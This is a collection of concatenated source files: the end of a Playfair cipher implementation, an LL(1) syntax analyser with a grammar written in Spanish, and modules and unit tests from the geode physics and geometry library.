tmp_list = np.array(self.key_without_repetition[:tam_list] + self.alfabeto_no_presente[:(25 - tam_list)])
self.square = np.reshape(tmp_list, (5, 5))
def cipher_decipher(self):
new_msg = ""
if(self.action==0):
for index in range(0, len(self.message), 2):
if (self.dict_col[self.message[index]] == self.dict_col[self.message[index + 1]]):
new_msg += self.square[(self.dict_row[self.message[index]] + 1) % 5][self.dict_col[self.message[index]]]
new_msg += self.square[(self.dict_row[self.message[index + 1]] + 1) % 5][
self.dict_col[self.message[index + 1]]]
elif (self.dict_row[self.message[index]] == self.dict_row[self.message[index + 1]]):
new_msg += self.square[self.dict_row[self.message[index]]][(self.dict_col[self.message[index]] + 1) % 5]
new_msg += self.square[self.dict_row[self.message[index + 1]]][
(self.dict_col[self.message[index + 1]] + 1) % 5]
else:
new_msg += self.square[self.dict_row[self.message[index]]][self.dict_col[self.message[index + 1]]]
new_msg += self.square[self.dict_row[self.message[index + 1]]][self.dict_col[self.message[index]]]
return new_msg
elif(self.action==1):
new_msg = ""
for index in range(0, len(self.message), 2):
if (self.dict_col[self.message[index]] == self.dict_col[self.message[index + 1]]):
new_msg += self.square[(self.dict_row[self.message[index]] - 1) % 5][self.dict_col[self.message[index]]]
new_msg += self.square[(self.dict_row[self.message[index + 1]] - 1) % 5][
self.dict_col[self.message[index + 1]]]
elif (self.dict_row[self.message[index]] == self.dict_row[self.message[index + 1]]):
new_msg += self.square[self.dict_row[self.message[index]]][(self.dict_col[self.message[index]] - 1) % 5]
new_msg += self.square[self.dict_row[self.message[index + 1]]][
(self.dict_col[self.message[index + 1]] - 1) % 5]
else:
new_msg += self.square[self.dict_row[self.message[index]]][self.dict_col[self.message[index + 1]]]
new_msg += self.square[self.dict_row[self.message[index + 1]]][self.dict_col[self.message[index]]]
for i in range(0, int(len(new_msg) / 2) - 1, 2):
if new_msg[i] == new_msg[i + 2]:
new_msg = new_msg[:i + 1] + new_msg[i + 2:]
if (new_msg[-1] == "x"):
new_msg = new_msg[:-1]
return new_msg
else:
raise Exception("Use 0 to Cypher and 1 to Decipher")
def main():
message = "THIS SECRET MESSAGE IS ENCRYPTED"
key = "yoan pinzon"
print("Message to Cypher: ", message)
to_cipher = PlayFair(message, key, 0)
to_cipher.init_square()
print("Square Key:")
print(to_cipher.square)
ciphered_message = to_cipher.cipher_decipher()
print("Message Encrypted: " + ciphered_message)
print()
print("Message to Decipher: ", ciphered_message)
to_decipher = PlayFair(ciphered_message, key, 1)
to_decipher.init_square()
print("Square Key:")
print(to_decipher.square)
print("Message Encrypted: " + to_decipher.cipher_decipher())
if __name__ == '__main__':
main()
``` |
{
"source": "jjpulidos/Programming-Languages-2020",
"score": 3
} |
#### File: jjpulidos/Programming-Languages-2020/mainSyntax.py
```python
from mainLexer import Lexer
flagSintaxis = False
token = ""
i = 0
j = 0
recursive_calls = []
dict_tk_conversion = {
"tk_suma": "+",
"tk_multiplicacion": "*",
"tk_modulo": "%",
"tk_par_izq": "(",
"tk_par_der": ")",
"tk_punto": ".",
"tk_coma": ",",
"tk_dos_puntos": ":",
"tk_corch_izq": "[",
"tk_corch_der": "]",
"tk_llave_izq": "{",
"tk_llave_der": "}",
"tk_diferente": "!=",
"tk_division": "//",
"tk_ejecuta": "->",
"tk_menor_igual": "<=",
"tk_mayor_igual": ">=",
"tk_igual": "==",
"tk_asig": "=",
"tk_menor": "<",
"tk_mayor": ">",
"tk_numero": "número",
"tk_cadena": "string",
"tk_menos": "-"
}
initial_symbol_grammar = "program"
not_terminals = ["program", "tipo", "declaracion",
"literal", "expr", "expr_aux", "expr_p2", "expr_p2_aux", "expr_p3", "expr_p3_aux", "expr_p4",
"cexpr", "cexpr_aux", "bin_op_log", "cexpr_p6", "cexpr_p6_aux", "bin_op_p6",
"cexpr_p7", "cexpr_p7_aux", "bin_op_p7", "cexpr_p8", "cexpr_p9", "cexpr_p9_aux", "cexpr_p10",
"cexpr_p10_aux", "expr_list_no_req", "expr_list_0_more", 'asignacion', 'asignacion_fc_nta',
'salida_aux', 'id_fc_aux', 'no_terminal_aux', 'operators', 'tk_corch_izq_fc',
'global_declaracion', 'nonlocal_declaracion', 'declaracion_asignacion_fc', 'print_statement',
'conditional_statement_1', 'conditional_statement_2', 'conditional_statement_3',
'statement', 'conditional_block', 'newline1_fc', 'newline2_fc', "expr_list_no_req_cor",
'loop_block', 'block_sin_epsilon', 'block_con_epsilon', 'identaciones_bse',"expr_list_0_more_cor",
'function_block', 'coma_fc', 'block_0o1', 'argumentos_star', 'argumentos_0o1',
'return_aux',"function_fc","return_0o1","ejecucion","return_statement","fc_return","class_block",
"id_object","dedent_0o1"
]
grammar = {
"tipo": [["int"], ["str"], ["bool"], ["object"], ["tk_corch_izq", "tipo", "tk_corch_der"],["tk_cadena"]],
"declaracion": [['tk_dos_puntos', 'tipo', 'tk_asig', 'expr']],
'asignacion': [
['asignacion_fc_nta']
],
'asignacion_fc_nta': [
['tk_asig', 'salida_aux'],
['tk_corch_izq', 'expr', 'tk_corch_der', 'tk_corch_izq_fc'],
['tk_punto', 'id', 'tk_asig', 'salida_aux'],
['']
],
'tk_corch_izq_fc': [['tk_asig', 'salida_aux'],
['']
],
'salida_aux': [
['id', 'id_fc_aux'],
['expr']
],
'id_fc_aux': [
['asignacion'],
['operators', 'expr'],
],
'no_terminal_aux': [
['tk_asig'],
['tk_corch_izq'],
['tk_punto'],
['']
],
'operators': [
['tk_suma'],
['tk_menos'],
['tk_multiplicacion'],
['tk_division'],
['tk_modulo'],
['tk_igual'],
['tk_diferente'],
['tk_menor_igual'],
['tk_mayor_igual'],
['tk_menor'],
['tk_mayor'],
['is'],
['or'],
['and'],
['if', 'expr', 'else', 'expr']
],
'global_declaracion': [
['global', 'id']
],
'nonlocal_declaracion': [
['nonlocal', 'id']
],
'declaracion_asignacion_fc': [
['declaracion'],
['asignacion'],
["ejecucion"]
],
"ejecucion":[
["tk_par_izq","expr_list_no_req","tk_par_der"]
],
'print_statement': [
['print', 'tk_par_izq', 'expr', 'tk_par_der']
],
'return_statement': [
["return","fc_return"]
],
"fc_return":[
["expr"],
[""]
],
'conditional_statement_1': [
['if', 'expr', 'tk_dos_puntos', 'NEWLINE', 'INDENT', 'block_sin_epsilon', "dedent_0o1", 'newline1_fc']
],
'newline1_fc': [
['DEDENT'],
['']
],
'conditional_statement_2': [
['elif', 'expr', 'tk_dos_puntos', 'NEWLINE', 'INDENT', 'block_sin_epsilon', 'newline2_fc'],
["conditional_statement_3"],
["loop_block"]
],
'newline2_fc': [
['NEWLINE', 'DEDENT'],
['DEDENT']
],
'conditional_statement_3': [
['else', 'tk_dos_puntos', 'NEWLINE', 'INDENT', 'block_sin_epsilon', "newline1_fc"],
['']
],
'statement': [
['print_statement'],
["return_statement"],
['id', 'declaracion_asignacion_fc'],
["self", "tk_punto", "id",'declaracion_asignacion_fc'],
['global_declaracion'],
['nonlocal_declaracion'],
['pass']
],
'conditional_block': [
['conditional_statement_1','conditional_statement_2']
],
'loop_block': [
['while', 'expr', 'tk_dos_puntos', 'NEWLINE', 'INDENT', 'block_sin_epsilon'],
['for', 'id', 'in', 'cexpr', 'tk_dos_puntos', 'NEWLINE', 'INDENT', 'block_sin_epsilon']
],
'function_block': [
["def", "id", "tk_par_izq", "argumentos_0o1", "tk_par_der", "tk_ejecuta", "tipo", "tk_dos_puntos",
"NEWLINE", "INDENT", "function_fc"],
],
"function_fc":[
["return", "return_aux", "newline1_fc"],
["block_sin_epsilon","return_0o1"]
],
"class_block":[
["class","id","tk_par_izq","id_object","tk_par_der" ,"tk_dos_puntos", "NEWLINE", "INDENT","block_sin_epsilon"]
],
"id_object":[
["id"],
["object"]
],
"return_0o1":[
["return", "return_aux"],
[""]
],
'argumentos_0o1': [
["coma_fc"],
[""]
],
'argumentos_star': [
["tk_coma", "coma_fc"],
[""]
],
'coma_fc': [
["id", "tk_dos_puntos", "tipo", "argumentos_star"],
["self", "tk_dos_puntos", "tipo", "argumentos_star"],
],
'block_0o1': [
["block_sin_epsilon", "NEWLINE"],
[""]
],
'return_aux': [
["expr"],
[""]
],
'identaciones_bse': [
['NEWLINE',"dedent_0o1"],
['DEDENT'],
['']
],
"dedent_0o1":[
["DEDENT"],
[""]
],
'block_sin_epsilon': [
['conditional_block', 'identaciones_bse', 'block_con_epsilon'],
['statement', 'identaciones_bse', 'block_con_epsilon'],
['loop_block', 'identaciones_bse', 'block_con_epsilon'],
["function_block", 'identaciones_bse', 'block_con_epsilon'],
["class_block", 'identaciones_bse', 'block_con_epsilon']
]
, 'block_con_epsilon': [
['conditional_block', 'identaciones_bse', 'block_con_epsilon'],
['statement', 'identaciones_bse', 'block_con_epsilon'],
['loop_block', 'identaciones_bse', 'block_con_epsilon'],
["function_block", 'identaciones_bse', 'block_con_epsilon'],
["class_block", 'identaciones_bse', 'block_con_epsilon'],
[""]
],
'program': [
['block_con_epsilon']
],
"literal": [["None"], ["True"], ["False"], ["tk_numero"], ["tk_cadena"]],
"expr": [["expr_p2", "expr_aux"]],
"expr_aux": [["if", "expr", "else", "expr_p2", "expr_aux"], [""]],
"expr_p2": [["expr_p3", "expr_p2_aux"]],
"expr_p2_aux": [["or", "expr_p3", "expr_p2_aux"], [""]],
"expr_p3": [["expr_p4", "expr_p3_aux"]],
"expr_p3_aux": [["and", "expr_p4", "expr_p3_aux"], [""]],
"expr_p4": [["not", "expr_p4"], ["cexpr"]],
"cexpr": [["cexpr_p6", "cexpr_aux"]],
"cexpr_aux": [["bin_op_log", "cexpr_p6", "cexpr_aux"], [""]],
"bin_op_log": [["tk_igual"], ["tk_diferente"], ["tk_mayor"], ["tk_menor"], ["tk_mayor_igual"], ["tk_menor_igual"],
["is"]],
"cexpr_p6": [["cexpr_p7", "cexpr_p6_aux"]],
"cexpr_p6_aux": [["bin_op_p6", "cexpr_p7", "cexpr_p6_aux"], [""]],
"bin_op_p6": [["tk_suma"], ["tk_menos"]],
"cexpr_p7": [["cexpr_p8", "cexpr_p7_aux"]],
"cexpr_p7_aux": [["bin_op_p7", "cexpr_p8", "cexpr_p7_aux"], [""]],
"bin_op_p7": [["tk_multiplicacion"], ["tk_division"], ["tk_modulo"]],
"cexpr_p8": [["tk_menos", "cexpr_p8"], ["cexpr_p9"]],
"cexpr_p9": [["cexpr_p10", "cexpr_p9_aux"]],
"cexpr_p9_aux": [["tk_punto", "id", "cexpr_p10_aux", "cexpr_p9_aux"],
["tk_corch_izq", "expr", "tk_corch_der", "cexpr_p9_aux"], [""]],
"expr_list_no_req_cor":[["expr", "expr_list_0_more_cor"], [""]],
"expr_list_0_more_cor": [["tk_coma", "expr", "expr_list_0_more_cor"], [""]],
"cexpr_p10": [["id", "cexpr_p10_aux"], ["literal"], ["tk_corch_izq", "expr_list_no_req_cor", "tk_corch_der"],
["tk_par_izq", "expr", "tk_par_der"], ["len", "tk_par_izq", "cexpr", "tk_par_der"],["self"]],
"cexpr_p10_aux": [["tk_par_izq", "expr_list_no_req", "tk_par_der"], [""]],
"expr_list_no_req": [["expr", "expr_list_0_more"], [""]],
"expr_list_0_more": [["tk_coma", "expr", "expr_list_0_more"], [""]]
}
pred_rules = {}
for k in grammar.keys():
pred_rules[k] = []
def log(s, debug=0):
if debug:
print(s)
def PRIMEROS(alpha, debug=0):
alpha = [alpha] if type(alpha) is str else alpha
set_primeros = set()
    if alpha[0] == "":  # 1. if alpha == epsilon
set_primeros = set_primeros.union([""])
return set_primeros
    if alpha[0] not in not_terminals:  # 2a. a_1 is a terminal
set_primeros = set_primeros.union([alpha[0]])
return set_primeros
    else:
        # 2b. alpha[0] is a non-terminal: union the PRIMEROS of each of its rules
        primeros_nt = set()
        for regla in grammar[alpha[0]]:
            primeros_nt = primeros_nt.union(PRIMEROS(regla, debug))
        log("After checking the rules of " + alpha[0] + " its PRIMEROS were found to be: " + str(
            primeros_nt), debug)
        set_primeros = set_primeros.union(primeros_nt)
        # if the non-terminal can derive epsilon, also add the PRIMEROS of the rest of alpha
        if "" in primeros_nt and len(alpha) > 1:
            set_primeros.remove("")
            set_primeros = set_primeros.union(PRIMEROS(alpha[1:], debug))
        return set_primeros
def SIGUIENTES(no_terminal):
global recursive_calls
set_siguientes = set()
if no_terminal == initial_symbol_grammar:
set_siguientes = set_siguientes.union(set("$"))
for nt, rules in grammar.items():
for rule in rules:
try:
index = rule.index(no_terminal)
if index == len(rule) - 1:
beta = ""
else:
beta = rule[index + 1:]
if type(beta) == str:
beta = [beta]
primeros_beta = PRIMEROS(beta)
set_siguientes = set_siguientes.union(primeros_beta)
set_siguientes.remove("")
if "" in primeros_beta or beta == "":
if nt not in recursive_calls:
recursive_calls.append(no_terminal)
set_siguientes = set_siguientes.union(SIGUIENTES(nt))
except ValueError:
pass
except KeyError:
pass
return set_siguientes
def PRED(no_terminal):
for rule in grammar[no_terminal]:
set_prediccion = set()
primeros_alpha = PRIMEROS(rule)
if "" in primeros_alpha:
set_prediccion = set_prediccion.union(primeros_alpha)
set_prediccion.remove("")
followings = SIGUIENTES(no_terminal)
set_prediccion = set_prediccion.union(followings)
else:
set_prediccion = set_prediccion.union(primeros_alpha)
lst_tmp = []
for i in set_prediccion:
lst_tmp.append(i)
pred_rules[no_terminal].append(lst_tmp)
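# Illustrative example: for a rule such as tipo -> int the prediction set is just
# PRIMEROS(['int']) = {'int'}; for a rule that can derive epsilon, the SIGUIENTES
# of the left-hand side are used instead, which is what drives the LL(1) parse below.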
def emparejar(token, token_esperado, lexer):
global i, j
# Emparejar No Terminales
if token == token_esperado:
token, i, j = lexer.getNextToken(i, j)
else:
errorSintaxis([[token_esperado]])
return token, i, j
def errorSintaxis(lista_tokens_Esperados):
global token, i, j, flagSintaxis
flagSintaxis = True
if i==-2 and j ==-2:
return
str_tmp = ""
for pred in lista_tokens_Esperados:
for token_esperado in pred:
try:
str_tmp += "'" + dict_tk_conversion[token_esperado] + "', "
except KeyError:
str_tmp += "'" + token_esperado + "', "
token_found = str(token[0])
try:
token_found = dict_tk_conversion[str(token[0])]
except KeyError:
pass
# tokens_expected = []
# for i in str_tmp[:-2].split(", "):
# try:
# tokens_expected.append(dict_tk_conversion[i])
# except KeyError:
# tokens_expected.append(i)
# print(tokens_expected)
print(
"<" + str(i+1) + "," + str(j) + ">" + " Error sintactico: se encontró: '" + token_found + "' y se esperaba " + str(
str_tmp[:-2]) + ".")
def nonTerminal(N, lexer):
    global token, i, j, flagSintaxis
for idx, pd in enumerate(pred_rules[N]):
if flagSintaxis:
return
if token[0] in pd:
for symbol in grammar[N][idx]:
if flagSintaxis:
return
if symbol in not_terminals:
nonTerminal(symbol, lexer)
if flagSintaxis:
return
elif symbol == "":
if flagSintaxis:
return
else:
token, i, j = emparejar(token[0], symbol, lexer)
                        if i == -1 and j == -1:  # end of file
token = ("$", i, j)
                        if i == -2 and j == -2:  # lexical error
                            flagSintaxis = True
if flagSintaxis:
return
return
tokensEsperados=[]
for k in pred_rules[N]:
tokensEsperados.append(k)
errorSintaxis(tokensEsperados)
return
def main():
global token, i, j, recursive_calls
for nt in not_terminals:
recursive_calls = []
PRED(nt)
lexer = Lexer("test.py")
with open("output.txt", "w") as file:
token, i, j = lexer.getNextToken(i, j)
nonTerminal(initial_symbol_grammar, lexer)
if not flagSintaxis:
if token[0] == '$':
print("El analisis sintactico ha finalizado exitosamente.")
else:
errorSintaxis(["No se esperaba este token"])
# print(token)
if __name__ == '__main__':
main()
``` |
{
"source": "jjqcat/geode",
"score": 2
} |
#### File: geode/force/__init__.py
```python
from __future__ import division,absolute_import
from geode import *
def edge_springs(mesh,mass,X,stiffness,damping_ratio):
return Springs(mesh.segment_soup().elements,mass,X,stiffness,damping_ratio)
def bending_springs(mesh,mass,X,stiffness,damping_ratio):
springs = ascontiguousarray(mesh.bending_quadruples()[:,(0,3)])
return Springs(springs,mass,X,stiffness,damping_ratio)
StrainMeasure = {2:StrainMeasure2d,3:StrainMeasure3d}
FiniteVolume = {(2,2):FiniteVolume2d,(3,2):FiniteVolumeS3d,(3,3):FiniteVolume3d}
LinearFiniteVolume = {(2,2):LinearFiniteVolume2d,(3,2):LinearFiniteVolumeS3d,(3,3):LinearFiniteVolume3d}
def finite_volume(mesh,density,X,model,m=None,plasticity=None,verbose=True):
elements = mesh.elements if isinstance(mesh,Object) else asarray(mesh,dtype=int32)
mx,d = asarray(X).shape[1],elements.shape[1]-1
if m is None:
m = mx
strain = StrainMeasure[d](elements,X)
if verbose:
strain.print_altitude_statistics()
if isinstance(model,dict):
model = model[d]
return FiniteVolume[m,d](strain,density,model,plasticity)
def linear_finite_volume(mesh,X,density,youngs_modulus=3e6,poissons_ratio=.4,rayleigh_coefficient=.05):
elements = mesh.elements if isinstance(mesh,Object) else asarray(mesh,dtype=int32)
m,d = asarray(X).shape[1],elements.shape[1]-1
if d==7:
return LinearFiniteVolumeHex(StrainMeasureHex(elements,X),density,youngs_modulus,poissons_ratio,rayleigh_coefficient)
else:
return LinearFiniteVolume[m,d](elements,X,density,youngs_modulus,poissons_ratio,rayleigh_coefficient)
def neo_hookean(youngs_modulus=3e6,poissons_ratio=.475,rayleigh_coefficient=.05,failure_threshold=.25):
return {2:NeoHookean2d(youngs_modulus,poissons_ratio,rayleigh_coefficient,failure_threshold),
3:NeoHookean3d(youngs_modulus,poissons_ratio,rayleigh_coefficient,failure_threshold)}
def simple_shell(mesh,density,Dm=None,X=None,stretch=(0,0),shear=0):
mesh = mesh if isinstance(mesh,Object) else TriangleSoup(asarray(mesh,dtype=int32))
if Dm is None:
X = asarray(X)
assert X.ndim==2 and X.shape[1]==2, 'Expected 2D rest state'
tris = mesh.elements
Dm = X[tris[:,1:]].swapaxes(1,2)-X[tris[:,0]].reshape(-1,2,1)
else:
assert X is None
shell = SimpleShell(mesh,ascontiguousarray(Dm),density)
shell.stretch_stiffness = stretch
shell.shear_stiffness = shear
return shell
LinearBendingElements = {2:LinearBendingElements2d,3:LinearBendingElements3d}
def linear_bending_elements(mesh,X,stiffness,damping):
X = asarray(X)
bend = LinearBendingElements[X.shape[1]](mesh,X)
bend.stiffness = stiffness
bend.damping = damping
return bend
CubicHinges = {2:CubicHinges2d,3:CubicHinges3d}
def cubic_hinges(mesh,X,stiffness,damping,angles=None):
bends = mesh.bending_tuples()
X = asarray(X)
Hinges = CubicHinges[X.shape[1]]
if angles is None:
angles = Hinges.angles(bends,X)
hinges = CubicHinges[X.shape[1]](bends,angles,X)
hinges.stiffness = stiffness
hinges.damping = damping
return hinges
BindingSprings = {2:BindingSprings2d,3:BindingSprings3d}
def binding_springs(nodes,parents,weights,mass,stiffness,damping_ratio):
parents = asarray(parents,dtype=int32)
return BindingSprings[parents.shape[1]](nodes,parents,weights,mass,stiffness,damping_ratio)
particle_binding_springs = ParticleBindingSprings
edge_binding_springs = BindingSprings2d
face_binding_springs = BindingSprings3d
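# Dispatch mirrors the dictionaries above (illustrative; `tet_mesh` and `X` are
# hypothetical inputs):
# fvm = finite_volume(tet_mesh, 1000, X, neo_hookean())  # picks FiniteVolume3d for tets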
```
#### File: geode/force/test_force.py
```python
from __future__ import absolute_import
from numpy import *
from geode import real
from geode.force import *
from geode.force.force_test import *
from geode.geometry.platonic import *
def test_gravity():
random.seed(12871)
X = random.randn(1,3)
gravity = Gravity([1])
force_test(gravity,X,verbose=1)
def test_ether_drag():
random.seed(12871)
X = random.randn(1,3)
drag = EtherDrag([1.2],7)
force_test(drag,X,verbose=1)
def test_springs():
random.seed(12871)
X0 = random.randn(2,3)
X = random.randn(2,3)
springs = Springs([[0,1]],[1.1,1.2],X0,5,7)
force_test(springs,X,verbose=1)
springs = Springs([[0,1]],[1.1,1.2],X0,[5],[7])
force_test(springs,X,verbose=1)
def test_fvm_2d():
random.seed(12872)
model = neo_hookean()
X = random.randn(3,2)
dX = .1*random.randn(3,2)
fvm = finite_volume([(0,1,2)],1000,X,model)
force_test(fvm,X+dX,verbose=1)
def test_fvm_s3d():
random.seed(12872)
model = neo_hookean()
X = random.randn(3,3)
dX = .1*random.randn(3,3)
fvm = finite_volume([(0,1,2)],1000,X,model)
force_test(fvm,X+dX,verbose=1)
def test_fvm_3d():
random.seed(12873)
model = neo_hookean()
X = random.randn(4,3)
dX = .1*random.randn(4,3)
fvm = finite_volume([(0,1,2,3)],1000,X,model)
force_test(fvm,X+dX,verbose=1)
def test_simple_shell():
for i in 0,1,3,4,7:
print '\ni = %d'%i
random.seed(12872+i)
X = random.randn(3,2)
X2 = .1*random.randn(3,3)
X2[:,:2] += X
shell = simple_shell([(0,1,2)],1000,X=X,stretch=(7,6),shear=3)
shell.F_threshold = 1e-7
force_test(shell,X2,verbose=1)
def test_bending():
random.seed(7218414)
stiffness = 7
damping = 3
for d in 2,3:
mesh = SegmentSoup([[0,1],[1,2]]) if d==2 else TriangleSoup([[0,2,1],[1,2,3]])
X = random.randn(d+1,d)
dX = .1*random.randn(d+1,d)
for bend in linear_bending_elements(mesh,X,stiffness,damping),cubic_hinges(mesh,X,stiffness,damping):
print '\n',type(bend).__name__
if 'CubicHinges' in type(bend).__name__: # Compare energy with slow_energy
angles = bend.angles(mesh.bending_tuples(),X)
for theta in random.randn(20):
iX = concatenate([X[:-1],[X[1]+(Rotation.from_angle(theta) if d==2 else Rotation.from_angle_axis(theta,X[2]-X[1]))*(X[-1]-X[1])]])
bend.update_position(iX,False)
energy = bend.elastic_energy()
slow_energy = bend.slow_elastic_energy(angles,X,iX)
error = relative_error(energy,slow_energy)
print 'slow energy error = %g (slow %g vs. %g, theta = %g)'%(error,slow_energy,energy,theta)
assert error<1e-8
force_test(bend,X+dX,verbose=1)
# Test against exact sphere energies. We don't actually compute the correct answers in 3D, since hinge based energies are fundamentally mesh dependent.
radius = 78
analytics = [('S_1',circle_mesh(1000,radius=radius),pi/radius,1,1e-5),
('S_2',sphere_mesh(3,radius=radius),2*pi,4,.015),
('S_1 x [0,e]',open_cylinder_mesh((0,0,0),(0,0,e),radius=radius,na=100),pi*e/radius,3,2e-4)]
for name,(mesh,X),known,fudge,tolerance in analytics:
flat = zeros(len(mesh.bending_tuples()))
bend = cubic_hinges(mesh,X,stiffness,damping,angles=flat)
energy = bend.slow_elastic_energy(flat,X,X)/stiffness/fudge
error = relative_error(energy,known)
print '%s: known %g, energy %g, ratio %r, error %g'%(name,known,energy,energy/known,error)
assert error<tolerance
def test_linear_fvm_2d():
random.seed(12872)
X = random.randn(3,2)
dX = .1*random.randn(3,2)
fvm = linear_finite_volume([(0,1,2)],X,1000)
force_test(fvm,X+dX,verbose=1)
def test_linear_fvm_s3d():
random.seed(12872)
X = random.randn(3,3)
dX = .1*random.randn(3,3)
fvm = linear_finite_volume([(0,1,2)],X,1000)
force_test(fvm,X+dX,verbose=1)
def test_linear_fvm_3d():
random.seed(12873)
X = random.randn(4,3)
dX = .1*random.randn(4,3)
fvm = linear_finite_volume([(0,1,2,3)],X,1000)
force_test(fvm,X+dX,verbose=1)
def test_linear_fvm_hex():
random.seed(12873)
X = [[0,0,0],[0,0,1],[0,1,0],[0,1,1],[1,0,0],[1,0,1],[1,1,0],[1,1,1]]+.1*random.randn(8,3)
dX = .1*random.randn(8,3)
fvm = linear_finite_volume([arange(8)],X,1000)
force_test(fvm,X+dX,verbose=1)
def test_air_pressure():
random.seed(2813)
mesh,X = icosahedron_mesh()
if 1:
X = vstack([random.randn(3),X,random.randn(3)])
mesh = TriangleSoup(mesh.elements+1)
X2 = X + random.randn(*X.shape)/10
for closed in 0,1:
for side in 1,-1:
print '\nclosed %d, side %d'%(closed,side)
air = AirPressure(mesh,X,closed,side)
force_test(air,X2,verbose=1)
def test_pins():
random.seed(17310)
X = random.randn(5,3)
nodes = [1,3]
mass = random.randn(len(X))**2
targets = random.randn(len(nodes),3)
pins = Pins(nodes,mass,targets,3.5,1.1)
force_test(pins,X,verbose=1)
def test_axis_pins():
random.seed(17310)
X = random.randn(5,3)
nodes = [1,3]
mass = random.randn(len(X))**2
targets = random.randn(len(nodes),3)
pins = AxisPins(nodes,mass,targets,3.5,1.1)
pins.axis = (2,3,4)
force_test(pins,X,verbose=1)
def test_surface_pins():
random.seed(127130)
# Test a sphere mesh ignoring errors in the Hessian
target_mesh,target_X = sphere_mesh(0)
X = random.randn(100,3)
mass = absolute(random.randn(len(X)))
nodes = unique(random.randint(len(X),size=50).astype(int32))
pins = SurfacePins(nodes,mass,target_mesh,target_X,7,1.1)
force_test(pins,X,verbose=1,ignore_hessian=1)
# Hessian should be correct if the closest points are all on faces
target_mesh = TriangleSoup([[0,1,2]])
target_X = 100*eye(3)
pins = SurfacePins(nodes,mass,target_mesh,target_X,7,1.1)
force_test(pins,X,verbose=1)
def test_binding_springs():
random.seed(73210)
for k in 2,3:
nodes = [1,2]
X = random.randn(20,3)
parents = {2:[[5,6],[8,9]],
3:[[5,6,7],[10,11,12]]}[k]
weights = random.uniform(1,2,(2,k))
weights /= weights.sum(axis=1).reshape(-1,1)
mass = absolute(random.randn(len(X)))
springs = binding_springs(nodes,parents,weights,mass,7,1.2)
force_test(springs,X,verbose=1)
def test_particle_binding_springs():
random.seed(73210)
X = random.randn(4,3)
mass = absolute(random.randn(len(X)))
springs = particle_binding_springs([[1,2]],mass,7,1.2)
force_test(springs,X,verbose=1)
if __name__=='__main__':
test_simple_shell()
```
#### File: geode/geometry/__init__.py
```python
from __future__ import (division,absolute_import)
from geode import *
from numpy import asarray
BoxTrees = {2:BoxTree2d,3:BoxTree3d}
def BoxTree(X,leaf_size):
X = asarray(X)
return BoxTrees[X.shape[1]](X,leaf_size)
ParticleTrees = {2:ParticleTree2d,3:ParticleTree3d}
def ParticleTree(X,leaf_size=1):
X = asarray(X)
return ParticleTrees[X.shape[1]](X,leaf_size)
SimplexTrees = {(2,1):SegmentTree2d,(3,1):SegmentTree3d,(2,2):TriangleTree2d,(3,2):TriangleTree3d}
def SimplexTree(mesh,X,leaf_size=1):
X = asarray(X)
return SimplexTrees[X.shape[1],mesh.d](mesh,X,leaf_size)
Boxes = {1:Box1d,2:Box2d,3:Box3d}
def Box(min,max):
try:
d = len(min)
except TypeError:
d = len(max)
return Boxes[d](min,max)
Spheres = {2:Sphere2d,3:Sphere3d}
def Sphere(center,radius):
center = asarray(center)
return Spheres[len(center)](center,radius)
Capsules = {2:Capsule2d,3:Capsule3d}
def Capsule(x0,x1,radius):
try:
d = len(x0)
except TypeError:
d = len(x1)
return Capsules[d](x0,x1,radius)
empty_boxes = {1:empty_box_1d,2:empty_box_2d,3:empty_box_3d}
def empty_box(d):
return empty_boxes[d]()
FrameImplicits = {2:FrameImplicit2d,3:FrameImplicit3d}
def FrameImplicit(frame,object):
return FrameImplicits[object.d](frame,object)
surface_levelsets = {1:surface_levelset_c3d,2:surface_levelset_s3d}
def surface_levelset(particles,surface,max_distance=inf,compute_signs=True):
return surface_levelsets[surface.d](particles,surface,max_distance,compute_signs)
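# Dispatch is by dimension, inferred from the data (illustrative):
# tree = BoxTree(random.randn(10, 3), leaf_size=4)  # builds a BoxTree3d
# box = Box((0, 0), (1, 1))                         # builds a Box2d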
```
#### File: geode/geometry/test_box_tree.py
```python
from __future__ import division
from geode import *
from geode.geometry.platonic import *
def test_box_tree():
random.seed(10098331)
for n in 0,1,35,99,100,101,199,200,201:
print
x = random.randn(n,3).astype(real)
tree = BoxTree(x,10)
tree.check(x)
def test_particle_tree():
random.seed(10098331)
for n in 0,1,35,99,100,101,199,200,201:
print
X = random.randn(n,3).astype(real)
tree = ParticleTree(X,10)
tree.check(X)
X[:] = random.randn(n,3).astype(real)
tree.update()
tree.check(X)
def test_simplex_tree():
mesh,X = sphere_mesh(4)
tree = SimplexTree(mesh,X,4)
rays = 1000
hits = ray_traversal_test(tree,rays,1e-6)
print 'rays = %d, hits = %d'%(rays,hits)
assert hits==642
if __name__=='__main__':
test_simplex_tree()
```
#### File: geode/geometry/test_offset.py
```python
from __future__ import division
from geode.geometry.platonic import *
from geode.vector import *
def test_offset():
random.seed(8123171)
offset = .1
alpha = 1/4
small = 1e-8
def single():
return TriangleSoup([(0,1,2)]),[(0,0,0),(1,0,0),(0,1,0)]
for name,(m,X) in ('single',single()),('tet',tetrahedron_mesh()),('cube',cube_mesh()),('ico',icosahedron_mesh()):
for i in xrange(10):
# Generate a random affine transform, and make it rather singular
if i:
A = random.randn(3,3)
for _ in xrange(2):
A = dot(A,A)
A *= linalg.det(A)**(-1/3)
AX = Matrix(A)*X
else:
AX = asarray(X,dtype=float)
for shell in 0,1:
top = TriangleTopology(m)
if not shell and top.has_boundary():
continue
print('%s : %s'%(name,('volume','shell')[shell]))
# Perform offset
om,oX = (rough_offset_shell if shell else rough_offset_mesh)(top,AX,offset)
assert om.is_manifold()
# Verify that random points on the surface have nice distances
ns = 100
w = random.rand(ns,3)
w /= w.sum(axis=-1)[:,None]
sX = (w[:,:,None]*oX[om.elements()[random.randint(0,om.n_faces,size=ns)]]).sum(axis=1)
phi,_,_,_ = surface_levelset(ParticleTree(sX),SimplexTree(m,AX),inf,not shell)
assert all(alpha*offset <= phi+small)
assert all(phi <= offset+small)
if __name__=='__main__':
test_offset()
```
#### File: geode/geometry/test_platonic.py
```python
from __future__ import division
from geode.geometry.platonic import *
from geode.vector import *
def test_octahedron():
mesh,X = octahedron_mesh()
assert mesh.nodes()==len(X)
assert relative_error(mesh.volume(X),4/3) < 1e-10
assert not len(mesh.nonmanifold_nodes(0))
def test_icosahedron():
mesh,X = icosahedron_mesh()
a = 2 # see http://en.wikipedia.org/wiki/Icosahedron
assert relative_error(mesh.surface_area(X),5*sqrt(3)*a**2) < 1e-5
assert relative_error(mesh.volume(X),5/12*(3+sqrt(5))*a**3) < 1e-5
sphere = sphere_mesh(3)
def test_tetrahedron():
mesh,X = tetrahedron_mesh()
